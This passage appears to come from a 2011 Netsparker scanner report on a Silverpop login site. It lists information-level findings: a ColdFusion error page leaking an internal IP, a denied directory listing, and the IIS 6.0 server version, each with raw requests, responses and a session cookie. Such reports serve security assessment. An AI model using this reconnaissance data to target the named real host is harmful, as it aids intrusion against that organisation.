            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
            
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td height&gt;&amp;nbsp;&lt;/td&gt;
    &lt;/tr&gt;

    
    &lt;tr&gt;
        &lt;td colspan=&quot;2&quot;&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
            Resources:
            &lt;ul&gt;
	    
                 &lt;li&gt;Enable Robust Exception Information to provide greater detail about the source of errors.  In the Administrator, click Debugging &amp; Logging &gt; Debug Output Settings, and select the Robust Exception Information option.&lt;/li&gt;
            
	&lt;li&gt;Check the &lt;a href=&apos;http://www.macromedia.com/go/proddoc_getdoc&apos; target=&quot;new&quot;&gt;ColdFusion documentation&lt;/a&gt; to verify that you are using the correct syntax.&lt;/li&gt;
	&lt;li&gt;Search the &lt;a href=&apos;http://www.macromedia.com/support/coldfusion/&apos; target=&quot;new&quot;&gt;Knowledge Base&lt;/a&gt; to find a solution to your problem.&lt;/li&gt;

            &lt;/ul&gt;
            &lt;p&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    
    &lt;tr&gt;
        &lt;td colspan=&quot;2&quot;&gt;
            &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Browser&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Remote Address&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;10.120.0.37&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Referrer&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;https://login1.vtrenz.net/&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Date/Time&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;08-Mar-11 06:06 AM&lt;/td&gt;
        	&lt;/tr&gt;
            &lt;/table&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;/table&gt;
    
    
    &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;/table&gt;
    &lt;/body&gt;&lt;/html&gt;

    
     ]]></rawresponse>

		<extrainformation>
			<info name="Extracted IP Address(es)">10.120.0.37</info>
		</extrainformation>


        <classification>
            <OWASP></OWASP>
            <WASC>13</WASC>
            <CWE>200</CWE>
            <CAPEC>118</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://login1.vtrenz.net/library/shared/chrome/js/</url>
		<type>ForbiddenResource</type>
		<severity>Information</severity>
		

		<rawrequest><![CDATA[GET /library/shared/chrome/js/ HTTP/1.1
Referer: https://login1.vtrenz.net/library/shared/chrome/js/prototype.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 08 Mar 2011 11:06:33 GMT


&lt;html&gt;&lt;head&gt;&lt;title&gt;Error&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;head&gt;&lt;title&gt;Directory Listing Denied&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;&lt;h1&gt;Directory Listing Denied&lt;/h1&gt;This Virtual Directory does not allow contents to be listed.&lt;/body&gt;&lt;/body&gt;&lt;/html&gt; ]]></rawresponse>

		<extrainformation>
		</extrainformation>

				
	</vulnerability>

	<vulnerability confirmed="False">
		<url>https://login1.vtrenz.net/</url>
		<type>IISVersion</type>
		<severity>Information</severity>
		

		<rawrequest><![CDATA[GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: login1.vtrenz.net
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Connection: close
Date: Tue, 08 Mar 2011 11:06:33 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: USERID=;Expires=Tue, 8 Mar 2011 06:06:32 EST;Domain=.vtrenz.net;Path=/;Secure;httpOnly,TIMESTAMP=;Expires=Tue, 8 Mar 2011 06:06:32 EST;Domain=.vtrenz.net;Path=/;Secure;httpOnly,AUTHKEY=;Expires=Tue, 8 Mar 2011 06:06:32 EST;Domain=.vtrenz.net;Path=/;Secure;httpOnly,JSESSIONID=3c301ea994f00549756f634f3220e631d502TR;Secure;path=/
Content-Encoding: 
Vary: Accept-Encoding
Transfer-Encoding: chunked



	&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Strict//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd&quot;&gt;
	&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;
	&lt;head&gt;
	&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;
	&lt;title&gt;Login to Engage B2B&lt;/title&gt;
	&lt;style type=&quot;text/css&quot;&gt;
		@import url(&apos;/library/shared/chrome/css/layout.css&apos;);
		@import url(&apos;/library/shared/content/css/form.css&apos;);
		@import url(&apos;/library/loginmodule/css/login.css&apos;);
	&lt;/style&gt;
	&lt;script type=&quot;text/javascript&quot; src=&quot;/library/shared/chrome/js/prototype.js&quot;&gt;&lt;/script&gt;
	&lt;script type=&quot;text/javascript&quot; src=&quot;/library/shared/chrome/js/behaviour.js&quot;&gt;&lt;/script&gt;
	
	
	&lt;/head&gt;
	
	&lt;body&gt;
	
	&lt;div id=&quot;app&quot;&gt;
		&lt;div id=&quot;container&quot;&gt; 
			&lt;div id=&quot;content&quot;&gt;
				 
	&lt;form action=&quot;/index.cfm?method=cLoginModule.loginUser&quot; method=&quot;post&quot; autocomplete=&quot;off&quot;&gt;
		&lt;p class=&quot;formRow&quot;&gt;
			&lt;label for=&quot;login&quot; class=&quot;prompt required&quot;&gt;Email&lt;/label&gt;
			&lt;div class=&quot;element&quot;&gt;
				&lt;input type=&quot;text&quot; id=&quot;login&quot; name=&quot;login&quot; value=&quot;&quot; tabindex=&quot;1&quot; class=&quot;xxlarge bigField&quot; /&gt;
			&lt;/div&gt;
		&lt;/p&gt;
		&lt;p class=&quot;formRow&quot;&gt;
			&lt;label for=&quot;password&quot; class=&quot;prompt required&quot;&gt;Password&lt;/label&gt;
			&lt;div class=&quot;element&quot;&gt;
				&lt;input type=&quot;password&quot; id=&quot;password&quot; name=&quot;password&quot; value=&quot;&quot; tabindex=&quot;2&quot; class=&quot;medium bigField&quot; /&gt; 
				&lt;a href=&quot;/index.cfm?method=cLoginModule.displayPWDRetrieval&quot; class=&quot;note&quot;&gt;Forgot Your Password?&lt;/a&gt;
			&lt;/div&gt;
		&lt;/p&gt;
		&lt;p class=&quot;element formRow&quot;&gt;
			&lt;input type=&quot;image&quot; id=&quot;submit&quot; name=&quot;submit&quot; tabindex=&quot;3&quot; src=&quot;/library/shared/content/grfx/form/login.gif&quot; /&gt;
		&lt;/p&gt;
	&lt;/form&gt;
	&lt;script type=&quot;text/javascript&quot;&gt;
		document.getElementById(&apos;login&apos;).focus();
	&lt;/script&gt;

			&lt;/div&gt;
			
		&lt;/div&gt;
	&lt;/div&gt;
	
	&lt;div id=&quot;footer&quot;&gt;
		&lt;div id=&quot;copyright&quot;&gt;Silverpop is a registered trademark of Silverpop Systems Inc.  All other trademarks are the property of their respective owners. Copyright 2011. All rights reserved.&lt;/div&gt;
	&lt;/div&gt;
	
	&lt;/body&gt;
	&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
			<info name="Extracted Version">Microsoft-IIS/6.0</info>
		</extrainformation>


        <classification>
            <OWASP>A6</OWASP>
            <WASC>13</WASC>
            <CWE></CWE>
            <CAPEC></CAPEC>
        </classification>
				
	</vulnerability>

</netsparker>
